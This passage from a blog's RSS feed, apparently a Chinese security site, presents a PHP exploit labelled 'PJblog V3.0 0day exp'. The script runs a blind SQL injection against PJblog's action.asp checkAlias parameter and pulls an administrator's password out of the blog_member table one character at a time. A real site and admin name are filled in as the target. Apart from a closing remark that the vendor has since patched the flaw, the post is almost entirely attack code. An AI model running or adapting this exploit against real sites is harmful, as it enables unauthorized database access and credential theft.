<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #000;" onclick="jssc.active(this)">echo</span> <span style="color: #f00;">&#8220;Scan password len:&#8221;</span>.<span style="color: #909;">$i</span>.<span style="color: #f00;">&#8220; ;asc form &#8221;</span>.<span style="color: #909;">$StaAsc</span>.<span style="color: #f00;">&#8220; to 127&#8243;</span>;</div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">for</span>(<span style="color: #909;">$j</span>=<span style="color: #909;">$StaAsc</span>;<span style="color: #909;">$j</span>&lt;=<span style="color: #a36;">127</span>;<span style="color: #909;">$j</span>++){</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #909;">$newurl</span>=<span style="color: #909;">$url</span>.<span style="color: #f00;">&#8216;/action.asp?action=checkAlias&amp;cname=firebug_plugins_firediff&#8221;%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c&#8217;</span>.<span style="color: #909;">$i</span>.<span style="color: #f00;">&#8216;%2c1%29%29%20From%20blog_member%20where%20mem_name=\&#8221;</span>.<span style="color: #909;">$var_name</span>.<span style="color: #f00;">&#8216;\&#8217;%29%3e&#8217;</span>.<span style="color: #909;">$j</span>.<span style="color: #f00;">&#8216;%20and%20&#8243;1&#8243;=&#8221;1&#8242;</span>;</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #909;">$var_pagelen</span>=<span style="color: #000;" onclick="jssc.active(this)">file_get_contents</span>(<span style="color: #909;">$newurl</span>);</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #909;">$var_newpagelen</span>=<span style="color: #000;" onclick="jssc.active(this)">strpos</span>(<span style="color: #909;">$var_pagelen</span>,<span style="color: #909;">$var_key</span>);</div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #00f;">if</span>(<span style="color: #909;">$var_newpagelen</span> == <span style="color: #00f;">true</span>){</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"tmpPassWord"</span>]=<span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"tmpPassWord"</span>].<span style="color: #000;" onclick="jssc.active(this)">chr</span>(<span style="color: #909;">$j</span>);</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #000;" onclick="jssc.active(this)">unset</span>(<span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"LenDo"</span>]);</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"LenI"</span>]=<span style="color: #909;">$i</span>+<span style="color: #a36;">1</span>;</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #000;" onclick="jssc.active(this)">doReload</span>();</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #00f;">break</span>;</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        }</div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #00f;">if</span>(<span style="color: #909;">$j</span> == <span style="color: #909;">$StaAsc</span>+<span style="color: #a36;">10</span>){</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #000;" onclick="jssc.active(this)">doReload</span>();</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #00f;">break</span>;</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        }</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    }</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">}</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">if</span> (<span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"LenI"</span>]==<span style="color: #a36;">40</span> &amp;&amp; !(<span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"LenDo"</span>])){ <span style="color: #000;" onclick="jssc.active(this)">echo</span> <span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"tmpPassWord"</span>]; }</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">function</span> <span style="color: #000;" onclick="jssc.active(this)">doReload</span>(){</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">?&gt;</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    &lt;<span style="color: #000;" onclick="jssc.active(this)">script</span>  <span style="color: #000;" onclick="jssc.active(this)">language</span>=<span style="color: #f00;">&#8220;javascript&#8221;</span>&gt;  </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    &lt;!&#8211;  </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #000;" onclick="jssc.active(this)">window</span>.<span style="color: #000;" onclick="jssc.active(this)">setTimeout</span>(<span style="color: #f00;">&#8216;location.reload()&#8217;</span>,<span style="color: #a36;">1000</span>);  </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #090;">//&#8211;&gt;  </span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    &lt;/<span style="color: #000;" onclick="jssc.active(this)">script</span>&gt;</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">&lt;?<span style="color: #000;" onclick="jssc.active(this)">php</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">}</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">?&gt;</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
</ol>
</div>
<pre class="php" style="display: none; background-color: #f0f0f0; border: #cccccc thin ridge;">&lt;?php
/*
PJblog V3.0 0day exp
code by 小蟑螂&amp;bink
www.0kee.com    www.t00ls.net
09.04.22
*/

$url="http://www.pjhome.net";    //注入地址
$var_name="puterjam";    //管理员
$var_key="check_right";    

if ($_SESSION["LenI"]){
    $LenI=$_SESSION["LenI"];
}else{
    $LenI=1;
}
for($i=$LenI;$i&lt;=40;$i++){
    if($_SESSION["LenDo"]){
        $StaAsc=$_SESSION["LenDo"];
    }else{
        $StaAsc=31;
    }
    echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";
    for($j=$StaAsc;$j&lt;=127;$j++){
        $newurl=$url.'/action.asp?action=checkAlias&amp;cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';
        $var_pagelen=file_get_contents($newurl);
        $var_newpagelen=strpos($var_pagelen,$var_key);
        if($var_newpagelen == true){
            $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);
            unset($_SESSION["LenDo"]);
            $_SESSION["LenI"]=$i+1;
            doReload();
            break;
        }
        if($j == $StaAsc+10){
            doReload();
            break;
        }
    }
}
if ($_SESSION["LenI"]==40 &amp;&amp; !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }

function doReload(){
?&gt;
    &lt;script  language="javascript"&gt;
    &lt;!--
    window.setTimeout('location.reload()',1000);
    //--&gt;
    &lt;/script&gt;
&lt;?php
}
?&gt;</pre>
<p><span class="Apple-style-span" style="word-spacing: 0px; font: 14px/22px Verdana; text-transform: none; color: #444444; text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: collapse; text-align: left; orphans: 2; widows: 2; webkit-border-horizontal-spacing: 0px; webkit-border-vertical-spacing: 0px; webkit-text-decorations-in-effect: none; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0;">此文发布时官方已经打了补丁</span></p>
<p style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </p>
<p></span></span></p>
<p style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </p>
<p style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/1566/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
